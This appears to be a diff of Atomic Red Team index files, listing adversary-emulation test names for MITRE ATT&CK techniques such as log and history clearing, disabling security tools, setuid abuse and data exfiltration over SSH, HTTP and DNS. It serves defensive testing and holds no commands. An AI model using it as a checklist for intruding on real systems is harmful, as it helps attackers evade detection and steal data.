execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
|
||||
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
|
||||
execution,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
|
||||
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
|
||||
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
|
||||
@@ -316,18 +422,26 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is runn
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,10,Obfuscated command line scripts (freebsd),5dc1d9dd-f396-4420-b985-32b1c4f79062,sh
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,11,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,12,Change login shell (freebsd),33b68b9b-4988-4caf-9600-31b7bf04227c,sh
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,13,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,14,Environment variable scripts (freebsd),663b205d-2121-48a3-a6f9-8c9d4d87dfee,sh
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,15,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,16,Detecting pipe-to-shell (freebsd),1a06b1ec-0cca-49db-a222-3ebb6ef25632,sh
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,17,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
|
||||
execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
|
||||
execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts,6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
|
||||
execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables,0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
|
||||
execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,sh
|
||||
execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
|
||||
execution,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
|
||||
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
|
||||
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
|
||||
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
|
||||
@@ -335,3 +449,4 @@ exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c5
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,9,Python3 http.server (freebsd),57a303a2-0bc6-400d-b144-4f3292920a0b,sh
|
||||
|
||||
|
@@ -24,25 +24,25 @@
|
||||
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
|
||||
- Atomic Test #1: Malicious PAM rule [linux]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [freebsd]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
|
||||
- Atomic Test #3: Malicious PAM module [linux]
|
||||
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
|
||||
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux]
|
||||
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux]
|
||||
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux]
|
||||
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux]
|
||||
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
|
||||
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
|
||||
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
|
||||
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
|
||||
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
|
||||
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
|
||||
- Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux]
|
||||
- Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
|
||||
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
|
||||
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
|
||||
- Atomic Test #10: chflags - Remove immutable file attribute [freebsd]
|
||||
- Atomic Test #10: chflags - Remove immutable file attribute [linux]
|
||||
- Atomic Test #11: Chmod through c script [macos, linux]
|
||||
- Atomic Test #12: Chmod through c script (freebsd) [freebsd]
|
||||
- Atomic Test #12: Chmod through c script (freebsd) [linux]
|
||||
- Atomic Test #13: Chown through c script [macos, linux]
|
||||
- Atomic Test #14: Chown through c script (freebsd) [freebsd]
|
||||
- Atomic Test #14: Chown through c script (freebsd) [linux]
|
||||
- [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
|
||||
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
|
||||
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -84,11 +84,11 @@
|
||||
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
|
||||
- Atomic Test #1: Sudo usage [macos, linux]
|
||||
- Atomic Test #2: Sudo usage (freebsd) [freebsd]
|
||||
- Atomic Test #2: Sudo usage (freebsd) [linux]
|
||||
- Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
|
||||
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [freebsd]
|
||||
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
|
||||
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
|
||||
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [freebsd]
|
||||
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
|
||||
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
|
||||
@@ -99,7 +99,7 @@
|
||||
- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1093 Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
|
||||
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd]
|
||||
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
|
||||
- Atomic Test #2: Masquerade as a built-in system executable [windows]
|
||||
- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -118,24 +118,24 @@
|
||||
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
|
||||
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
|
||||
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [freebsd]
|
||||
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
|
||||
- Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
|
||||
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
|
||||
- Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
|
||||
- [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
|
||||
- Atomic Test #1: rm -rf [macos, linux]
|
||||
- Atomic Test #2: rm -rf [freebsd]
|
||||
- Atomic Test #2: rm -rf [linux]
|
||||
- Atomic Test #3: Delete log files using built-in log utility [macos]
|
||||
- Atomic Test #4: Truncate system log files via truncate utility [macos]
|
||||
- Atomic Test #5: Truncate system log files via truncate utility (freebsd) [freebsd]
|
||||
- Atomic Test #5: Truncate system log files via truncate utility (freebsd) [linux]
|
||||
- Atomic Test #6: Delete log files via cat utility by appending /dev/null or /dev/zero [macos]
|
||||
- Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [freebsd]
|
||||
- Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [linux]
|
||||
- Atomic Test #8: System log file deletion via find utility [macos]
|
||||
- Atomic Test #9: Overwrite macOS system log via echo utility [macos]
|
||||
- Atomic Test #10: Overwrite FreeBSD system log via echo utility [freebsd]
|
||||
- Atomic Test #10: Overwrite FreeBSD system log via echo utility [linux]
|
||||
- Atomic Test #11: Real-time system log clearance/deletion [macos]
|
||||
- Atomic Test #12: Delete system log files via unlink utility [macos]
|
||||
- Atomic Test #13: Delete system log files via unlink utility (freebsd) [freebsd]
|
||||
- Atomic Test #13: Delete system log files via unlink utility (freebsd) [linux]
|
||||
- Atomic Test #14: Delete system log files using shred utility [macos]
|
||||
- Atomic Test #15: Delete system log files using srm utility [macos]
|
||||
- Atomic Test #16: Delete system log files using OSAScript [macos]
|
||||
@@ -183,21 +183,21 @@
|
||||
- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
|
||||
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
|
||||
- Atomic Test #2: Clear sh history (rm) [freebsd]
|
||||
- Atomic Test #2: Clear sh history (rm) [linux]
|
||||
- Atomic Test #3: Clear Bash history (echo) [linux]
|
||||
- Atomic Test #4: Clear sh history (echo) [freebsd]
|
||||
- Atomic Test #4: Clear sh history (echo) [linux]
|
||||
- Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
|
||||
- Atomic Test #6: Clear sh history (cat dev/null) [freebsd]
|
||||
- Atomic Test #6: Clear sh history (cat dev/null) [linux]
|
||||
- Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
|
||||
- Atomic Test #8: Clear sh history (ln dev/null) [freebsd]
|
||||
- Atomic Test #8: Clear sh history (ln dev/null) [linux]
|
||||
- Atomic Test #9: Clear Bash history (truncate) [linux]
|
||||
- Atomic Test #10: Clear sh history (truncate) [freebsd]
|
||||
- Atomic Test #10: Clear sh history (truncate) [linux]
|
||||
- Atomic Test #11: Clear history of a bunch of shells [linux, macos]
|
||||
- Atomic Test #12: Clear history of a bunch of shells (freebsd) [freebsd]
|
||||
- Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux]
|
||||
- Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
|
||||
- Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
|
||||
- Atomic Test #15: Disable Bash History Logging with SSH -T [linux]
|
||||
- Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [freebsd]
|
||||
- Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux]
|
||||
- Atomic Test #17: Prevent Powershell History Logging [windows]
|
||||
- Atomic Test #18: Clear Powershell History by Deleting History File [windows]
|
||||
- Atomic Test #19: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
|
||||
@@ -209,12 +209,12 @@
|
||||
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
|
||||
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
|
||||
- Atomic Test #2: Certutil Rename and Decode [windows]
|
||||
- Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos]
|
||||
- Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos]
|
||||
- Atomic Test #3: Base64 decoding with Python [linux, macos]
|
||||
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
|
||||
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
|
||||
- Atomic Test #6: Base64 decoding with shell utilities (freebsd) [freebsd]
|
||||
- Atomic Test #7: FreeBSD b64encode Shebang in CLI [freebsd]
|
||||
- Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos]
|
||||
- Atomic Test #6: Base64 decoding with shell utilities (freebsd) [linux]
|
||||
- Atomic Test #7: FreeBSD b64encode Shebang in CLI [linux]
|
||||
- Atomic Test #8: Hex decoding with shell utilities [linux, macos]
|
||||
- Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
|
||||
- Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
|
||||
- [T1562 Impair Defenses](../../T1562/T1562.md)
|
||||
@@ -256,10 +256,10 @@
|
||||
- Atomic Test #14: Provlaunch.exe Executes Arbitrary Command via Registry Key [windows]
|
||||
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
|
||||
- Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos]
|
||||
- Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos]
|
||||
- Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos]
|
||||
- Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos]
|
||||
- Atomic Test #1: Set a file's access timestamp [linux, macos]
|
||||
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
|
||||
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
|
||||
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
|
||||
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
|
||||
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
|
||||
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
|
||||
@@ -292,11 +292,11 @@
|
||||
- Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
|
||||
- Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
|
||||
- Atomic Test #7: Stop/Start UFW firewall [linux]
|
||||
- Atomic Test #8: Stop/Start Packet Filter [freebsd]
|
||||
- Atomic Test #8: Stop/Start Packet Filter [linux]
|
||||
- Atomic Test #9: Stop/Start UFW firewall systemctl [linux]
|
||||
- Atomic Test #10: Turn off UFW logging [linux]
|
||||
- Atomic Test #11: Add and delete UFW firewall rules [linux]
|
||||
- Atomic Test #12: Add and delete Packet Filter rules [freebsd]
|
||||
- Atomic Test #12: Add and delete Packet Filter rules [linux]
|
||||
- Atomic Test #13: Edit UFW firewall user.rules file [linux]
|
||||
- Atomic Test #14: Edit UFW firewall ufw.conf file [linux]
|
||||
- Atomic Test #15: Edit UFW firewall sysctl.conf file [linux]
|
||||
@@ -381,8 +381,8 @@
|
||||
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
|
||||
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
|
||||
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux]
|
||||
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux]
|
||||
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
|
||||
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
|
||||
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
|
||||
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
|
||||
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
|
||||
@@ -407,15 +407,15 @@
|
||||
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
|
||||
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
|
||||
- Atomic Test #1: Make and modify binary from C source [macos, linux]
|
||||
- Atomic Test #2: Make and modify binary from C source (freebsd) [freebsd]
|
||||
- Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
|
||||
- Atomic Test #3: Set a SetUID flag on file [macos, linux]
|
||||
- Atomic Test #4: Set a SetUID flag on file (freebsd) [freebsd]
|
||||
- Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
|
||||
- Atomic Test #5: Set a SetGID flag on file [macos, linux]
|
||||
- Atomic Test #6: Set a SetGID flag on file (freebsd) [freebsd]
|
||||
- Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
|
||||
- Atomic Test #7: Make and modify capabilities of a binary [linux]
|
||||
- Atomic Test #8: Provide the SetUID capability to a file [linux]
|
||||
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
|
||||
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
|
||||
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
|
||||
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
|
||||
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1054 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -430,9 +430,9 @@
|
||||
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
|
||||
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
|
||||
- Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [freebsd]
|
||||
- Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [linux]
|
||||
- Atomic Test #3: Logging Configuration Changes on Linux Host [linux]
|
||||
- Atomic Test #4: Logging Configuration Changes on FreeBSD Host [freebsd]
|
||||
- Atomic Test #4: Logging Configuration Changes on FreeBSD Host [linux]
|
||||
- Atomic Test #5: Disable Powershell ETW Provider - Windows [windows]
|
||||
- Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd) [windows]
|
||||
- Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
|
||||
@@ -497,14 +497,14 @@
|
||||
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
|
||||
- Atomic Test #1: Disable history collection [linux, macos]
|
||||
- Atomic Test #2: Disable history collection (freebsd) [freebsd]
|
||||
- Atomic Test #2: Disable history collection (freebsd) [linux]
|
||||
- Atomic Test #3: Mac HISTCONTROL [macos, linux]
|
||||
- Atomic Test #4: Clear bash history [linux]
|
||||
- Atomic Test #5: Setting the HISTCONTROL environment variable [linux]
|
||||
- Atomic Test #6: Setting the HISTFILESIZE environment variable [linux]
|
||||
- Atomic Test #7: Setting the HISTSIZE environment variable [freebsd]
|
||||
- Atomic Test #7: Setting the HISTSIZE environment variable [linux]
|
||||
- Atomic Test #8: Setting the HISTFILE environment variable [linux]
|
||||
- Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [freebsd]
|
||||
- Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux]
|
||||
- Atomic Test #10: Setting the HISTIGNORE environment variable [linux]
|
||||
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -539,7 +539,7 @@
|
||||
- Atomic Test #5: Remove Administrative Shares [windows]
|
||||
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
|
||||
- Atomic Test #1: Disable syslog [linux]
|
||||
- Atomic Test #2: Disable syslog (freebsd) [freebsd]
|
||||
- Atomic Test #2: Disable syslog (freebsd) [linux]
|
||||
- Atomic Test #3: Disable Cb Response [linux]
|
||||
- Atomic Test #4: Disable SELinux [linux]
|
||||
- Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux]
|
||||
@@ -580,7 +580,7 @@
|
||||
- Atomic Test #40: Suspend History [linux]
|
||||
- Atomic Test #41: Reboot Linux Host via Kernel System Request [linux]
|
||||
- Atomic Test #42: Clear Pagging Cache [linux]
|
||||
- Atomic Test #43: Disable Memory Swap [freebsd, linux]
|
||||
- Atomic Test #43: Disable Memory Swap [linux]
|
||||
- Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
|
||||
- Atomic Test #45: AMSI Bypass - Override AMSI via COM [windows]
|
||||
- Atomic Test #46: AWS - GuardDuty Suspension or Deletion [iaas:aws]
|
||||
@@ -596,7 +596,7 @@
|
||||
- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
|
||||
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
|
||||
- Atomic Test #2: Decode base64 Data into Script [freebsd]
|
||||
- Atomic Test #2: Decode base64 Data into Script [linux]
|
||||
- Atomic Test #3: Execute base64-encoded PowerShell [windows]
|
||||
- Atomic Test #4: Execute base64-encoded PowerShell from Windows Registry [windows]
|
||||
- Atomic Test #5: Execution from Compressed File [windows]
|
||||
@@ -625,7 +625,7 @@
|
||||
- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
|
||||
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
|
||||
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
|
||||
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [freebsd, linux]
|
||||
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [linux]
|
||||
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
|
||||
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
|
||||
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
|
||||
@@ -646,7 +646,7 @@
|
||||
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
|
||||
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
|
||||
- Atomic Test #2: Install root CA on FreeBSD [freebsd]
|
||||
- Atomic Test #2: Install root CA on FreeBSD [linux]
|
||||
- Atomic Test #3: Install root CA on Debian/Ubuntu [linux]
|
||||
- Atomic Test #4: Install root CA on macOS [macos]
|
||||
- Atomic Test #5: Install root CA on Windows [windows]
|
||||
@@ -655,9 +655,9 @@
|
||||
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
|
||||
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
|
||||
- Atomic Test #2: Dynamic C# Compile [windows]
|
||||
- Atomic Test #3: C compile [freebsd, linux, macos]
|
||||
- Atomic Test #4: CC compile [freebsd, linux, macos]
|
||||
- Atomic Test #5: Go compile [freebsd, linux, macos]
|
||||
- Atomic Test #3: C compile [linux, macos]
|
||||
- Atomic Test #4: CC compile [linux, macos]
|
||||
- Atomic Test #5: Go compile [linux, macos]
|
||||
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1197 BITS Jobs](../../T1197/T1197.md)
|
||||
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
|
||||
@@ -697,15 +697,15 @@
|
||||
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
|
||||
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos]
|
||||
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos]
|
||||
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
|
||||
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
|
||||
- Atomic Test #3: Overwrite and delete a file with shred [linux]
|
||||
- Atomic Test #4: Delete a single file - Windows cmd [windows]
|
||||
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
|
||||
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
|
||||
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
|
||||
- Atomic Test #8: Delete Filesystem - Linux [linux]
|
||||
- Atomic Test #9: Delete Filesystem - FreeBSD [freebsd]
|
||||
- Atomic Test #9: Delete Filesystem - FreeBSD [linux]
|
||||
- Atomic Test #10: Delete Prefetch File [windows]
|
||||
- Atomic Test #11: Delete TeamViewer Log Files [windows]
|
||||
